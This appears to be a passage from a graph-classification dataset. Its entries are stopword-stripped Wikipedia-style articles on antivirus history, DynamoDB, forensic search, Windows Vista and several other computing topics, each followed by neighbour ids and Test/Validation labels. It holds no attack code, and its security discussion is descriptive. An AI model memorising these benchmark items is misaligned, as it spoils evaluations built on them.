disks hard disks however internet usage became common viruses began spread online competing claims innovator first antivirus product possibly first publicly documented removal wild computer virus i.e vienna virus performed bernd fix 1987 1987 andreas lüning kai figge founded g data software 1985 released first antivirus product atari st platform 1987 ultimate virus killer uvk also released de facto industry standard virus killer atari st atari falcon last version version 9.0 released april 2004 1987 united states john mcafee founded mcafee company part intel security end year released first version virusscan also 1987 czechoslovakia peter paško rudolf hrubý miroslav trnka created first version nod antivirus 1987 fred cohen wrote algorithm perfectly detect possible computer viruses finally end 1987 first two heuristic antivirus utilities released flushot plus ross greenberg anti4us erwin lanting o'reilly book malicious mobile code virus protection windows roger grimes described flushot plus first holistic program fight malicious mobile code mmc however kind heuristic used early av engines totally different used today first product heuristic engine resembling modern ones f-prot 1991 early heuristic engines based dividing binary different sections data section code section legitimate binary usually starts always location indeed initial viruses re-organized layout sections overrode initial portion section order jump end file malicious code located—only going back resume execution original code specific pattern used time legitimate software represented elegant heuristic catch suspicious code kinds advanced heuristics later added suspicious section names incorrect header size regular expressions partial pattern in-memory matching 1988 growth antivirus companies continued germany tjark auerbach founded avira h+bedv time released first version antivir named luke filewalker time bulgaria vesselin bontchev released first freeware antivirus program later joined frisk software also frans veldman released first version thunderbyte antivirus also known tbav sold company norman safeground 1998 czechoslovakia pavel baudiš eduard kučera started avast time alwil software released first version avast antivirus june 1988 south korea ahn cheol-soo released first antivirus software called v1 founded ahnlab later 1995 finally autumn 1988 united kingdom alan solomon founded international created dr. solomon anti-virus toolkit although launched commercially 1991 – 1998 solomon ’ company acquired mcafee november 1988 professor panamerican university mexico city named alejandro e. carriles copyrighted first antivirus software mexico name byte matabichos byte bugkiller help solve rampant virus infestation among students also 1988 mailing list named virus-l started bitnet/earn network new viruses possibilities detecting eliminating viruses discussed members mailing list alan solomon eugene kaspersky kaspersky lab friðrik skúlason frisk software john mcafee mcafee luis corrons panda security mikko hyppönen f-secure péter szőr tjark auerbach avira vesselin bontchev frisk software 1989 iceland friðrik skúlason created first version f-prot anti-virus back 1989 founded frisk software 1993 meanwhile united states symantec founded gary hendrix 1982 launched first symantec antivirus macintosh sam sam 2.0 released march 1990 incorporated technology allowing users easily update sam intercept eliminate new viruses including many n't exist time program release end 1980s united kingdom jan hruska peter lammer founded security firm sophos began producing first antivirus encryption products period hungary also virusbuster founded recently incorporated sophos 1990 spain mikel urizarbarrena founded panda security panda software time hungary security researcher péter szőr released first version pasteur antivirus italy gianfranco tonello created first version virit explorer antivirus founded tg soft one year later 1990 computer antivirus research organization caro founded 1991 caro released virus naming scheme originally written friðrik skúlason vesselin bontchev although naming scheme outdated remains existing standard computer security companies researchers ever attempted adopt caro members includes alan solomon costin raiu dmitry gryaznov eugene kaspersky friðrik skúlason igor muttik mikko hyppönen morton swimmer nick fitzgerald padgett peterson peter ferrie righard zwienenberg vesselin bontchev 1991 united states symantec released first version norton antivirus year czech republic jan gritzbach tomáš hofer founded avg technologies grisoft time although released first version anti-virus guard avg 1992 hand finland f-secure founded 1988 petri allas risto siilasmaa – name data fellows released first version antivirus product f-secure claims first antivirus firm establish presence world wide web 1991 european institute computer antivirus research eicar founded antivirus research improve development antivirus software 1992 russia igor danilov released first version spiderweb later became dr web 1994 av-test reported 28,613 unique malware samples based md5 database time companies founded 1996 romania bitdefender founded released first version anti-virus expert avx 1997 russia eugene kaspersky natalya kaspersky co-founded security firm kaspersky lab 1996 also first wild linux virus known staog 1999 av-test reported 98,428 unique malware samples based md5 database 2000 rainer link howard fuhs started first open source antivirus engine called openantivirus project 2001 tomasz kojm released first version clamav first ever open source antivirus engine commercialised 2007 clamav bought sourcefire turn acquired cisco systems 2013 2002 united kingdom morten lund theis søndergaard co-founded antivirus firm bullguard 2005 av-test reported 333,425 unique malware samples based md5 database 2007 av-test reported number 5,490,960 new unique malware samples based md5 year 2012 2013 antivirus firms reported new malware samples range 300,000 500,000 per day years become necessary antivirus software use several different strategies e.g specific email network protection low level modules detection algorithms well check increasing variety files rather executables several reasons 2005 f-secure first security firm developed anti-rootkit technology called blacklight users usually connected internet continual basis jon oberheide first proposed cloud-based antivirus design 2008 february 2008 mcafee labs added industry-first cloud-based anti-malware functionality virusscan artemis name tested av-comparatives february 2008 officially unveiled august 2008 mcafee virusscan cloud av created problems comparative testing security software – part av definitions testers control constantly updated av company servers thus making results non-repeatable result anti-malware testing standards organisation amtso started working method testing cloud products adopted may 7 2009 2011 avg introduced similar cloud service called protective cloud technology following 2013 release apt 1 report mandiant industry seen shift towards signature-less approaches problem capable detecting mitigating zero-day attacks numerous approaches address new forms threats appeared including behavioral detection artificial intelligence machine learning cloud-based file detonation according gartner expected rise new entrants carbon black cylance crowdstrike force epp incumbents new phase innovation acquisition one method bromium involves micro-virtualization protect desktops malicious code execution initiated end user another approach sentinelone carbon black focuses behavioral detection building full context around every process execution path real time cylance leverages artificial intelligence model based machine learning increasingly signature-less approaches defined media analyst firms next-generation antivirus seeing rapid market adoption certified antivirus replacement technologies firms coalfire directdefense response traditional antivirus vendors trend micro symantec sophos responded incorporating next-gen offerings portfolios analyst firms forrester gartner called traditional signature-based antivirus ineffective outdated one solid theoretical results study computer viruses frederick b. cohen 1987 demonstration algorithm perfectly detect possible viruses however using different layers defense good detection rate may achieved several methods antivirus engine use identify malware traditional antivirus software relies heavily upon signatures identify malware substantially malware arrives hands antivirus firm analysed malware researchers dynamic analysis systems determined malware proper signature file extracted added signatures database antivirus software although signature-based approach effectively contain malware outbreaks malware authors tried stay step ahead software writing oligomorphic polymorphic recently metamorphic viruses encrypt parts otherwise modify method disguise match virus signatures dictionary many viruses start single infection either mutation refinements attackers grow dozens slightly different strains called variants generic detection refers detection removal multiple threats using single virus definition example vundo trojan several family members depending antivirus vendor classification symantec classifies members vundo family two distinct categories trojan.vundo trojan.vundo.b may advantageous identify specific virus quicker detect virus family generic signature inexact match existing signature virus researchers find common areas viruses family share uniquely thus create single generic signature signatures often contain non-contiguous code using wildcard characters differences lie wildcards allow scanner detect viruses even padded extra meaningless code detection uses method said heuristic detection anti-virus software attempt scan rootkits rootkit type malware designed gain administrative-level control computer system without detected rootkits change operating system functions cases tamper anti-virus program render ineffective rootkits also difficult remove cases requiring complete re-installation operating system real-time protection on-access scanning background guard resident shield autoprotect synonyms refer automatic protection provided antivirus anti-spyware anti-malware programs monitors computer systems suspicious activity computer viruses spyware adware malicious objects 'real-time words data loaded computer active memory inserting cd opening email browsing web file already computer opened executed commercial antivirus software end-user license agreements include clause subscription automatically renewed purchaser credit card automatically billed renewal time without explicit approval example mcafee requires users unsubscribe least 60 days expiration present subscription bitdefender sends notifications unsubscribe 30 days renewal norton antivirus also renews subscriptions automatically default apparent antivirus programs actually malware masquerading legitimate software winfixer ms antivirus mac defender false positive false alarm antivirus software identifies non-malicious file malware happens cause serious problems example antivirus program configured immediately delete quarantine infected files common microsoft windows antivirus applications false positive essential file render windows operating system applications unusable recovering damage critical software infrastructure incurs technical support costs businesses forced close whilst remedial action undertaken examples serious false-positives running real-time protection multiple antivirus programs concurrently degrade performance create conflicts however using concept called multiscanning several companies including g data software microsoft created applications run multiple engines concurrently sometimes necessary temporarily disable virus protection installing major updates windows service packs updating graphics card drivers active antivirus protection may partially completely prevent installation major update anti-virus software cause problems installation operating system upgrade e.g upgrading newer version windows place — without erasing previous version windows microsoft recommends anti-virus software disabled avoid conflicts upgrade installation process active anti-virus software also interfere firmware update process functionality computer programs hampered active anti-virus software example truecrypt disk encryption program states troubleshooting page anti-virus programs conflict truecrypt cause malfunction operate slowly anti-virus software impair performance stability games running steam platform support issues also exist around antivirus application interoperability common solutions like ssl vpn remote access network access control products technology solutions often policy assessment applications require up-to-date antivirus installed running antivirus application recognized policy assessment whether antivirus application updated part policy assessment library user unable connect studies december 2007 showed effectiveness antivirus software decreased previous year particularly unknown zero day attacks computer magazine c't found detection rates threats dropped 40–50 2006 20–30 2007 time exception nod32 antivirus managed detection rate 68 according zeus tracker website average detection rate variants well-known zeus trojan low 40 problem magnified changing intent virus authors years ago obvious virus infection present viruses day written amateurs exhibited destructive behavior pop-ups modern viruses often written professionals financed criminal organizations 2008 eva chen ceo trend micro stated anti-virus industry over-hyped effective products — misleading customers — years independent testing major virus scanners consistently shows none provide 100 virus detection best ones provided high 99.9 detection simulated real-world situations lowest provided 91.1 tests conducted august 2013 many virus scanners produce false positive results well identifying benign files malware although methods may differ notable independent quality testing agencies include av-comparatives icsa labs west coast labs virus bulletin av-test members anti-malware testing standards organization anti-virus programs always effective new viruses even use non-signature-based methods detect new viruses reason virus designers test new viruses major anti-virus applications make sure detected releasing wild new viruses particularly ransomware use polymorphic code avoid detection virus scanners jerome segura security analyst paretologic explained proof concept virus used graphics processing unit gpu avoid detection anti-virus software potential success involves bypassing cpu order make much harder security researchers analyse inner workings malware detecting rootkits major challenge anti-virus programs rootkits full administrative access computer invisible users hidden list running processes task manager rootkits modify inner workings operating system tamper antivirus programs file infected computer virus anti-virus software attempt remove virus code file disinfection always able restore file undamaged state circumstances damaged files restored existing backups shadow copies also true ransomware installed software damaged requires re-installation however see system file checker writeable firmware computer infected malicious code major concern infected bios could require actual bios chip replaced ensure malicious code completely removed anti-virus software effective protecting firmware motherboard bios infection 2014 security researchers discovered usb devices contain writeable firmware modified malicious code dubbed badusb anti-virus software detect prevent malicious code run undetected computer could even infect operating system prior booting antivirus software drawbacks first impact computer performance furthermore inexperienced users lulled false sense security using computer considering invulnerable may problems understanding prompts decisions antivirus software presents incorrect decision may lead security breach antivirus software employs heuristic detection must fine-tuned minimize misidentifying harmless software malicious false positive antivirus software usually runs highly trusted kernel level operating system allow access potential malicious process files creating potential avenue attack us national security agency nsa uk government communications headquarters gchq intelligence agencies respectively exploiting anti-virus software spy users anti-virus software highly privileged trusted access underlying operating system makes much appealing target remote attacks additionally anti-virus software years behind security-conscious client-side applications like browsers document readers means acrobat reader microsoft word google chrome harder exploit 90 percent anti-virus products according joxean koret researcher coseinc singapore-based information security consultancy antivirus software running individual computers common method employed guarding malware solution solutions also employed users including unified threat management utm hardware network firewalls cloud-based antivirus online scanners network firewalls prevent unknown programs processes accessing system however antivirus systems make attempt identify remove anything may protect infection outside protected computer network limit activity malicious software present blocking incoming outgoing requests certain tcp/ip ports firewall designed deal broader system threats come network connections system alternative virus protection system cloud antivirus technology uses lightweight agent software protected computer offloading majority data analysis provider infrastructure one approach implementing cloud antivirus involves scanning suspicious files using multiple antivirus engines approach proposed early implementation cloud antivirus concept called cloudav cloudav designed send programs documents network cloud multiple antivirus behavioral detection programs used simultaneously order improve detection rates parallel scanning files using potentially incompatible antivirus scanners achieved spawning virtual machine per detection engine therefore eliminating possible issues cloudav also perform retrospective detection whereby cloud detection engine rescans files file access history new threat identified thus improving new threat detection speed finally cloudav solution effective virus scanning devices lack computing power perform scans examples cloud anti-virus products panda cloud antivirus crowdstrike cb defense immunet comodo group also produced cloud-based anti-virus antivirus vendors maintain websites free online scanning capability entire computer critical areas local disks folders files periodic online scanning good idea run antivirus applications computers applications frequently slow catch threats one first things malicious software attack disable existing antivirus software sometimes way know attack turning online resource installed infected computer virus removal tools available help remove stubborn infections certain types infection examples include avast free anti- malware avg free malware removal tools avira antivir removal tool also worth noting sometimes antivirus software produce false positive result indicating infection none rescue disk bootable cd usb storage device used run antivirus software outside installed operating system order remove infections dormant bootable antivirus disk useful example installed operating system longer bootable malware resisting attempts removed installed antivirus software examples bootable disks include bitdefender rescue cd kaspersky rescue disk 2018 windows defender offline integrated windows 10 since anniversary update rescue cd software also installed onto usb storage device bootable newer computers according fbi survey major businesses lose 12 million annually dealing virus incidents survey symantec 2009 found third small medium-sized business use antivirus protection time whereas 80 home users kind antivirus installed according sociological survey conducted g data software 2010 49 women use antivirus program
[ 3072, 2049, 4100, 5636, 10245, 10756, 9227, 9233, 9746, 8724, 9242, 6683, 1052, 9246, 9761, 3106, 11299, 2084, 550, 9256, 2601, 10388, 43, 6699, 3629, 9771, 9775, 8753, 2611, 8243, 8247, 10297, 3643, 7739, 9791, 1088, 10816, 10308, 4165, ...
None
2,214
4
Common_Computing_Security_Standards_Forum:common computing security standards forum common computing security standards forum ccss forum voluntary organization vendors providers security software operating systems internet browsers ccss forum formed following goals 2009 melih abdulhayoğlu organized common computing security standards forum initially purpose maintaining list legitimate antivirus engines response scareware products present antivirus software either adware malware according fbi aware estimated loss victims rogue antivirus software much 150 million ccss maintains so-called whitelist legitimate organizations provide antivirus systems trusted vendors list viewed organization web site http //www.ccssforum.org
[ 517, 8615 ]
Test
2,215
9
Security_and_Trust_Services_API_for_J2ME:security trust services api j2me security trust services api j2me satsa collection java me-based apis provides compliant devices additional cryptographic security features permits communication java application smartcard apdu java card rmi protocols satsa developed java community process jsr 177 covers following features natively supported original java platform satsa api considered optional feature sun microsystems mandated java phones however device manufacturers may include required several device manufacturers already chosen include satsa products among several mobile phone manufacturers
[ 4960, 9665, 3561, 3626, 9745, 9011 ]
None
2,216
9
FL_(programming_language):fl programming language fl short function level functional programming language created ibm almaden research center john backus john williams edward wimmers 1980s documented report 1989 fl designed successor backus earlier fp language providing specific support backus termed function-level programming fl dynamically typed strict functional programming language throw catch exception semantics much like ml function implicit history argument used things like strictly functional input/output i/o also used linking c code optimization exists type-system extension hindley–milner type inference many language ’ innovative ideas since implemented kenneth e. iverson ’ j language plasm geometry-oriented extension subset fl language first described 1992
[ 9345, 1826, 8262, 10668, 2670, 7055, 5168, 1976, 5081, 7386, 2045 ]
Validation
2,217
1
Amazon_DynamoDB:amazon dynamodb amazon dynamodb fully managed proprietary nosql database service supports key-value document data structures offered amazon.com part amazon web services portfolio dynamodb exposes similar data model derives name dynamo different underlying implementation dynamo multi-master design requiring client resolve version conflicts dynamodb uses synchronous replication across multiple datacenters high durability availability dynamodb announced amazon cto werner vogels january 18 2012 presented evolution amazon simpledb solution vogels motivates project 2012 announcement amazon began decentralized network services originally services direct access ’ databases became bottleneck engineering operations services moved away direct access pattern favor public-facing apis still third-party relational database management systems struggled handle amazon ’ client base culminated 2004 holiday season several technologies failed high scale traffic engineers normalizing relational systems reduce data redundancy design optimizes storage sacrifice stored given “ item ” data e.g information pertaining product product database several relations takes time assemble disjoint parts query many amazon ’ services demanded mostly primary-key reads data speed top priority putting pieces together taxing systems content compromising storage efficiency amazon ’ response dynamo highly available key-value store built internal use dynamo seemed everything engineers needed adoption lagged amazon developers opted “ works ” design patterns s3 simpledb systems noticeable design flaws demand overhead provisioning hardware scaling re-partitioning data amazon next iteration nosql technology dynamodb automated database management operations reduce headache developers dynamodb differs amazon services allowing developers purchase service based throughput rather storage auto scaling enabled database scale automatically additionally administrators request throughput changes dynamodb spread data traffic number servers using solid-state drives allowing predictable performance offers integration hadoop via elastic mapreduce september 2013 amazon made available local development version dynamodb developers test dynamodb-backed applications locally dynamodb table features items attributes form primary key whereas relational systems item features table attribute juggles “ null ” “ unknown ” values absence dynamodb items schema-less exception creating table developer specifies primary key table requires key item therein primary keys must scalar strings numbers binary take one two forms single-attribute primary key known table ’ “ partition key. ” partition key determines partition item hashes to––more partitioning below––so ideal partition key uniform distribution range primary key also feature second attribute dynamodb calls table ’ “ sort key. ” case partition keys unique paired sort keys make unique identifier item partition key still used determine partition item stored within partition items sorted sort key relational model indices typically serve “ helper ” data structures supplement table allow dbms optimize queries hood improve query functionality dynamodb query optimizer index simply another table different key two sits beside original developer creates index creates new copy data fields specifies get copied minimum fields indexes original table ’ primary key dynamodb users issue queries directly indices two types indices available global secondary index features partition key optional sort key ’ different original table ’ partition key local secondary index features partition key original table different sort key indices introduce entirely new query functionality dynamodb database allowing queries new keys indexing system data redundancy pure simple relational philosophy permit indices prime example dynamodb prioritizes speed space efficiency like relational systems dynamodb updates indices automatically addition/update/deletion must judicious creating risk slowing write-heavy database slew index updates dynamodb uses json syntax ubiquity development community create table action demands three arguments tablename keyschema––a list containing partition key optional sort key––and attributedefinitions––a list attributes defined must least contain definitions attributes used partition sort keys whereas relational databases offer robust query languages dynamodb offers put get update delete operations put requests contain tablename attribute item attribute consists attributes values item update request follows syntax similarly get delete item simply specify tablename key dynamodb uses hashing b trees manage data upon entry data first distributed different partitions hashing partition key partition store 10gb data handle default 1000 write capacity units wcu 3000 read capacity units rcu one rcu represents one strongly consistent read per second two eventually consistent reads per second items 4kb size one wcu represents one write per second item 1kb size prevent data loss dynamodb features two-tier backup system replication long-term storage partition features three nodes contains copy partition ’ data node also contains two data structures b tree used locate items replication log notes changes made node dynamodb periodically takes snapshots two data structures stores month s3 engineers perform point-in-time restores databases within partition one three nodes designated “ leader node. ” write operations travel first leader node propagating makes writes consistent dynamodb maintain status leader sends “ heartbeat ” node every 1.5 seconds another node stop receiving heartbeats initiate new leader election dynamodb uses paxos algorithm elect leaders amazon engineers avoided dynamo originally due engineering overheads like provisioning managing partitions nodes response dynamodb team built service calls autoadmin manage database autoadmin replaces node stops responding copying data another node partition exceeds three thresholds rcu wcu 10gb autoadmin automatically add additional partitions segment data like indexing systems relational model dynamodb demands updates table reflected table ’ indices dynamodb handles using service calls “ log propagator ” subscribes replication logs node sends put update delete requests indices necessary indices result substantial performance hits write requests dynamodb allows user five given table suppose dynamodb user issues write operation put update delete typical relational system would convert sql query relational algebra run optimization algorithms dynamodb skips processes gets right work request arrives dynamodb request router authenticates–– “ request coming where/whom claims ” ––and checks authorization–– “ user submitting request requisite permissions ” assuming checks pass system hashes request ’ partition key arrive appropriate partition three nodes within copy partition ’ data system first writes leader node writes second node sends “ success ” message finally continues propagating third node writes consistent always travel first leader node finally log propagator propagates change indices index grabs index ’ primary key value item performs write index without log propagation operation update pre-existing item updated attribute may serve primary key index thus b tree index must update well b trees handle insert delete read operations practice log propagator receives update operation issues delete operation put operation indices suppose dynamodb user issues get operation request router proceeds authentication authorization next hash partition key arrive appropriate hash encounter problem three nodes eventual consistency one another decide investigate dynamodb affords user two options issuing read consistent eventually consistent consistent read visits leader node consistency-availability tradeoff rears head read-heavy systems always reading leader overwhelm single node reduce availability second option eventually consistent read selects random node practice dynamodb trades consistency availability take route odds inconsistency ’ need write operation return “ success ” begin propagating third node finish ’ also need get target third node means 1-in-3 chance inconsistency within write ’ propagation window long window number catastrophes could cause node fall behind vast majority cases third node up-to-date within milliseconds leader languages frameworks dynamodb binding include java javascript node.js go c .net perl php python ruby haskell erlang django grails dynamodb exposes performance metrics help users provision correctly keep applications using dynamodb running smoothly metrics tracked using aws management console using aws command line interface monitoring tool integrating amazon cloudwatch
[ 8962, 8451, 10628, 3462, 8582, 1801, 6027, 4236, 10893, 911, 1935, 4623, 8592, 2965, 2328, 4377, 8986, 1435, 5660, 9245, 11038, 6307, 3876, 11556, 9766, 5159, 6444, 5677, 7983, 8495, 3121, 7352, 10681, 2496, 4289, 11201, 8644, 9286, 1224, ...
Validation
2,218
4
Forensic_search:forensic search forensic search emerging field computer forensics forensic search focuses user created data email files cell phone records office documents pdfs files easily interpreted person forensic search differs computer forensic analysis seek review analyze lower level system files registry link files disk level issues commonly associated traditional computer forensic analysis forensic search emerged due number factors including objective forensic search software allow person general knowledge computers skilled document review investigation techniques undertake search user created electronically stored information esi data typically considered user created esi made emails documents pictures file types created user opposed data created computer operating system i.e registry files link files unallocated space controlled created computer user objective reviewing user created data find information may used base decisions part investigation forensic search software differs using native applications e.g outlook desktop search software e.g google desktop search data changes made data processing searching may impact results skew findings forensic search software also allow access base metadata items available via native application good example would metadata ms word documents number forensic search software products able perform data recovery range email file types examples using native application non-forensic application affect data forensic search software likened ediscovery review software however strictly case ediscovery review software dealing many type computer records search options offer extra functionality forensic search software features redaction legal hold standard ediscovery review software also case forensic search software meet higher end tasks outlined widely accepted electronic discovery reference model edrm tasks identification collection preservation presentation generally covered forensic search software however true ediscovery review generally domain qualified legal practitioners companies use term ediscovery become catchall circles processing searching electronically stored information esi however true representation term ediscovery detailed understanding ediscovery electronic discovery reference model edrm good guideline could said forensic search closely related early case assessment eca ediscovery eca require rigor full ediscovery review presenting data part report may used form decision evidence important data correctly represented reader understand case generating reports system created data registry files link files system created data costly exercise also case straightforward answer explanation example would attempting explain lay person method techniques decoding userassist key windows system registry userassist key hold great deal information actions user computer however explain key reviewer able identify key correctly interpret key setting keys often encoded rot 13 keys decoded human readable formats reviewer show setting relates case often time consuming review hundreds even thousands settings times deliver circumstantial sometimes contentious findings reviewing user created data e-mail contracts reporting understanding findings often much straight forward semi skilled user usually good grasp email works use day-to-day work legal person understand contract need specialist forensic knowledge lead much lower costs review less contentious circumstantial findings features forensic search software focused allowing user search view range data users ’ files one time specific features forensic search software many newer emerging fields computer forensics cloud forensics mobile phone forensics network forensics memory analysis browser forensics forensic triage internet forensics distant past computer forensic expert ’ common role attend person ’ house place work data center forensically 'image computers devices may involved case categorized collection phase collection phase complete images reviewed esi relevant supplied interested parties required computer forensic investigator good deal experience training process time consuming costly computer forensic expert ’ primary role investigate computer evidence esi may familiar entire case objectives case agent detective forensic accountant crime analyst often led non-perfect time consuming identification correct evidence items differing parties would immediately flag interest detective deep knowledge case parties involved may go unnoticed computer forensic expert example would email suspect another case suspect case contact phone calls witness suspect compound issue massive increase size data computer forensic expert needs collect often case computer hard drive able imaged example computer contains evidence big system shut take image mission critical server email server company file server rise cloud computing also added challenges collection evidence data requires collection review may reside cloud case computer available image forensic expert needs collect information using forensic software designed work certain cloud providers short collection evidence changed significantly past years recognizing challenges concept hybrid forensics discussed creation tools adopt different approach collecting data concept hybrid forensics selective collection data 'live systems way may considered reliable evidence court law enforcement organizations like many organizations divided skill specific units computer forensic cybercrime area units take responsibility aspects esi discussed forensic search point 5 units usually time poor resourced albeit time resources low main knowledge unit comes officers consultants 7+ years experience predates computer forensic degrees available officers become familiar time methodology using forensic analysis software package offer started field hence new officers resources become available forensic analysis software prioritized newer specific software newer forensic field types forensic search software become popular method reducing time cost search analysis larger data sets focusing user data often yields evidence results e-mail seductive powerful evidence personal plentiful candid adults e-mail primary means written communication lawyers think e-discovery e-mail crave surprise e-mail traffic sought-after fought-over esi new generation tools developed order address challenges faced digital forensic ediscovery practitioners
[ 4194, 8389 ]
Test
2,219
4
Brian_Lord_(cyber_security_expert):brian lord cyber security expert brian richard lord born december 1965 former deputy director intelligence cyber operations government communications headquarters gchq cheltenham england managing director cyber pgi protection group international international consultancy specialising cyber security risk consulting brian lord born bradford december 1965 son computer programmer teacher mathematics educated bradford grammar school 1972-1984 brian lord served royal corps signals 1984 1992 joining civil service worked gchq 21 years leaving deputy director intelligence cyber operations awarded obe 2005 new year honours september 2013 joined pgi protection group international consultancy specialising cyber security risk consulting managing director cyber described telegraph leading thinker sector cyber warfare october 2017 lord cleared charge sexual assault gloucester crown court prosecutors present evidence plead guilty common assault placing hand woman knee 2 – 3 minutes party 2016 believed first person british legal history charged common assault particulars assault touching defendant knee according lawyer three judges questioned whether public interest continue case view minor nature
[ 4595 ]
Test
2,220
7
EthosCE:ethosce ethosce learning management system administration continuing medical education nursing pharmacy healthcare-related programs developed dlc solutions provides interfaces organizations produce manage continuing education websites distribution provided software-as-a-service web application administrative interface allows users administer system web browser supports online mobile registration learners communication in-person online training events application includes online transcripts tracking professional certifications integration accreditation council continuing medical education accme program reporting system pars web service ethosce course object api used define learning objects added workflow built support drupal nodes part course requirement workflow including multiple course objects api allows content/assessments non-drupal external objects delivered tracked course content provides access taking enrolling learners courses ethosce originally released 14 april 2009 dlc solutions version 7.4 discontinued support creating moodle course objects integrated external scorm/tincan/xapi player released 12 december 2014
[ 467, 8644 ]
Test
2,221
2
Technical_features_new_to_Windows_Vista:technical features new windows vista windows vista formerly codenamed windows longhorn many significant new features compared previous microsoft windows versions covering aspects operating system addition new user interface security capabilities developer technologies several major components core operating system redesigned notably audio print display networking subsystems results work visible software developers end-users see appear evolutionary changes user interface part redesign networking architecture ipv6 incorporated operating system number performance improvements introduced tcp window scaling prior versions windows typically needed third-party wireless networking software work properly longer case windows vista includes comprehensive wireless networking support graphics windows vista introduces new well major revisions direct3d new display driver model facilitates new desktop window manager provides tearing-free desktop special effects cornerstones windows aero graphical user interface new display driver model also able offload rudimentary tasks gpu allow users install drivers without requiring system reboot seamlessly recover rare driver errors due illegal application behavior core operating system many improvements made memory manager process scheduler heap manager i/o scheduler kernel transaction manager implemented used data persistence services enable atomic transactions service used give applications ability work file system registry using atomic transaction operations windows vista features completely re-written audio stack designed provide low-latency 32-bit floating point audio higher-quality digital signal processing bit-for-bit sample level accuracy 144 db dynamic range new audio apis created team including steve ball larry osterman new audio stack runs user level thus increasing stability windows vista audio engine designed run faster windows xp audio engine tighter requirements audio buffer position accuracy also new universal audio architecture uaa model introduced replacing wdm audio allows compliant audio hardware automatically work windows without needing device drivers audio hardware vendor three major apis windows vista audio architecture applications communicate audio driver sessions sessions programmed windows audio session api wasapi general wasapi operates two modes exclusive mode also called dma mode unmixed audio streams rendered directly audio adapter application audio play signal processing effect exclusive mode useful applications demand least amount intermediate processing audio data want output compressed audio data dolby digital dts wma pro s/pdif wasapi exclusive mode similar kernel streaming function kernel mode programming required shared mode audio streams rendered application optionally applied per-stream audio effects known local effects lfx per-session volume control streams mixed global audio engine set global audio effects gfx may applied finally 're rendered audio device higher level apis waveform-audio interface wavexxx functions directsound use shared mode results pre-mixed pcm audio sent driver single format terms sample rate bit depth channel count format configurable end user control panel passing wasapi host-based audio processing including custom audio processing take place sample rate conversion mixing effects host-based processing modules referred audio processing objects apos components operate user mode portion architecture runs kernel mode audio driver contains port class driver vendor miniport driver vendor hal windows kernel mixer kmixer completely gone direct path directsound audio drivers directsound mme emulated session instances since whole point directsound acceleration allow hardware process unmixed audio content directsound accelerated audio model directsound3d supported also breaks eax extensions apis asio openal affected windows vista also includes new multimedia class scheduler service mmcss allows multimedia applications register time-critical processing run elevated thread priority thus ensuring prioritized access cpu resources time-sensitive dsp processing mixing tasks audio professionals new wavert port driver introduced strives achieve real-time performance using multimedia class scheduler supports audio applications reduce latency audio streams consequently user mode applications completely govern streams audio without code execution kernel runtime wavert allows user mode application direct access internal audio hardware buffers sample position counters data memory mapped audio hardware dma engine allows applications poll current position dma memory window hardware accessing wavert also supports notion hardware generated clock notification event similar asio api applications need poll current position n't want existing audio apis re-plumbed emulated use apis internally audio goes three apis applications work fault mme wavein/waveout emulation introduced windows vista sample rate conversion needed audible noise sometimes introduced playing audio web browser uses apis internal resampler longer configurable defaults linear interpolation lowest-quality conversion mode could set previous versions windows resampler set high-quality mode via hotfix windows 7 windows server 2008 r2 new digital signal processing functionalities room correction bass management loudness equalization speaker fill introduced speaker fill mixes 2-channel content use available speakers manner similar creative cmss bass management used redirect subwoofer signal main speakers channel missing feature called channel phantoming allows best use speakers redirecting sound missing channels speakers whether multi-channel stereo sound system home theater living room windows vista also includes ability calibrate speakers room placing microphone listener plans sit running wizard measures room response windows vista automatically set levels delay frequency balance channel accordingly position pcs equipped stereo headphones vista adds ability surround sound using new feature called headphone virtualization uses technology based upon head-related transfer function windows vista also includes ability use custom host-based digital signal processing effects part audio device manufacturer-supplied driver value-added features effects packaged user-mode system effect audio processing objects sapos sapos also reusable third-party software windows vista builds universal audio architecture new class driver definition aims reduce need third-party drivers increase overall stability reliability audio windows microsoft also included new high quality voice capture directx media object dmo part directshow allows voice capture applications instant messengers speech recognition applications apply acoustic echo cancellation microphone array processing speech signals windows vista first windows operating system include fully integrated support speech recognition windows 2000 xp speech recognition installed office 2003 included windows xp tablet pc edition windows speech recognition allows users control machine voice commands enables dictation many applications application fairly high recognition accuracy provides set commands assists dictation brief speech-driven tutorial included help familiarize user speech recognition commands training could also completed improve accuracy speech recognition windows vista includes speech recognition 8 languages release time english u.s. british spanish german french japanese chinese traditional simplified support additional languages planned post-release speech recognition vista utilizes version 5.3 microsoft speech api sapi version 8 speech recognizer speech synthesis first introduced windows windows 2000 significantly enhanced windows vista code name mulan old voice microsoft sam replaced two new natural sounding voices generally greater intelligibility anna lili latter capable speaking chinese screen-reader narrator uses voices also updated microsoft agent text speech applications use newer sapi 5 voices windows vista includes redesigned print architecture built around windows presentation foundation provides high-fidelity color printing improved use color management removes limitations current gdi-based print subsystem enhances support printing advanced effects gradients transparencies etc. color laser printers use xml paper specification xps print subsystem windows vista implements new xps print path well legacy gdi print path legacy support windows vista transparently makes use xps print path printers support otherwise using gdi print path documents intensive graphics xps printers expected produce much greater quality prints gdi printers networked environment print server running windows vista documents rendered client machine rather server using feature known client side rendering rendered intermediate form transferred server printed without additional processing making print servers scalable offloading rendering computation clients xps print path introduced windows vista supports high quality 16-bit color printing xps print path uses xml paper specification xps print spooler file format serves page description language pdl printers xps spooler format intended replacement enhanced metafile emf format print spooler format graphics device interface gdi print path xps xml-based specifically xaml-based color-managed device resolution independent vector-based paged document format encapsulates exact representation actual printed output xps documents packed zip container along text fonts raster images 2d vector graphics drm information printers supporting xps eliminates intermediate conversion printer-specific language increasing reliability fidelity printed output microsoft claims major printer vendors planning release printers built-in xps support provide better fidelity original document core xps print path xpsdrv xps-based printer driver includes filter pipeline contains set filters print processing modules xml-based configuration file describe filters loaded filters receive spool file data input perform document processing rendering pdl post-processing output pdl data printer consume filters perform single function watermarking page color transformations perform several print processing functions specific document parts individually collectively convert spool file page description language supported printer windows vista also provides improved color support windows color system higher color precision dynamic range also supports cmyk colorspace multiple ink systems higher print fidelity print subsystem also support named colors simplifying color definition images transmitted printer supporting colors xps print path automatically calibrate color profile settings used display subsystem conversely xps print drivers express configurable capabilities printer virtue xps printcapabilities class enable fine-grained control print settings tuned individual printing device applications use windows presentation foundation display elements directly print xps print path without need image colorspace conversion xps format used spool file represents advanced graphics effects 3d images glow effects gradients windows presentation foundation primitives processed printer drivers without rasterization preventing rendering artifacts reducing computational load legacy gdi print path used xps spool file used processing converted gdi image minimize processing done raster level print schemas provide xml-based format expressing organizing large set properties describe either job format print capabilities hierarchically 